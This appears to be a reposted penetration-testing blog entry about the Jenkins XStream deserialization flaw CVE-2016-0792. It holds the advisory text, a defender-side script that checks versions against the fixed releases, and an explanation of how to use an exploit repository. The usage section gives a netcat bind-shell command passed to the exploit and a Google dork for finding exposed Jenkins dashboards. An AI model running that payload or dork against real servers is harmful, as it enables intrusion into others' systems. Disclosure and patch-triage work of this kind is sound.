Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
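A defender-side version triage against the fixed releases named in the advisory (weekly 1.650, LTS 1.642.2), as an added example that is not part of this post or of the exploit repository; it assumes the version is read from the X-Jenkins response header and that the sample header table below is constructed.

```python
"""Classify Jenkins version strings against the CVE-2016-0792 fix boundaries.

Added example, not from the original post. Assumes the advisory's boundaries
(weekly line fixed in 1.650, LTS line fixed in 1.642.2) and that the version
string comes from the X-Jenkins response header.
"""
import re

WEEKLY_FIXED = (1, 650)      # two-component versions: 1.NNN
LTS_FIXED = (1, 642, 2)      # three-component versions: 1.NNN.M


def parse_version(text):
    """Return numeric components, e.g. '1.642.2-SNAPSHOT' -> (1, 642, 2)."""
    m = re.match(r"\s*(\d+(?:\.\d+)+)", text)
    if not m:
        raise ValueError("not a Jenkins version: %r" % text)
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(version):
    """True when the version falls inside the range the advisory lists as vulnerable."""
    parts = parse_version(version)
    if len(parts) == 3:
        # Three components mean an LTS release; fixed from 1.642.2 onward
        return parts < LTS_FIXED
    # Two components mean a weekly release; fixed from 1.650 onward
    return parts < WEEKLY_FIXED


# Constructed sample data, as an inventory script might collect it
SAMPLE_HEADERS = {
    "ci-a": {"X-Jenkins": "1.642.1"},
    "ci-b": {"X-Jenkins": "1.642.2"},
    "ci-c": {"X-Jenkins": "1.649"},
    "ci-d": {"X-Jenkins": "2.7.1"},
    "ci-e": {},  # no version header exposed; cannot classify
}


def triage(headers_by_host):
    """Map host -> affected flag; hosts without an X-Jenkins header are skipped."""
    result = {}
    for host, headers in headers_by_host.items():
        version = headers.get("X-Jenkins")
        if version is not None:
            result[host] = is_affected(version)
    return result


if __name__ == "__main__":
    for host, flag in sorted(triage(SAMPLE_HEADERS).items()):
        print(host, "affected" if flag else "fixed")
```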
Exploit for Jenkins serialization vulnerability – CVE-2016-0792
More information can be found here
The requests library is required for this exploit to work:
sudo pip install requests
git clone http://ift.tt/2vfSwAm
from exploit import exploit
Here url is the URL of the Jenkins server and command is the command to execute:
exploit('http://ift.tt/2tRLOgm', '/usr/bin/nc -l -p 9999 -e /bin/sh')
This will run nc and listen on port 9999 on the vulnerable machine.
For demonstration purposes I will be running the ISO from Pentester Lab.
Google dork: intitle: “Dashboard [Jenkins]” + “Manage Jenkins”
The post Jenkins CVE-2016-0792 Deserialization Remote Exploit appeared first on Penetration Testing.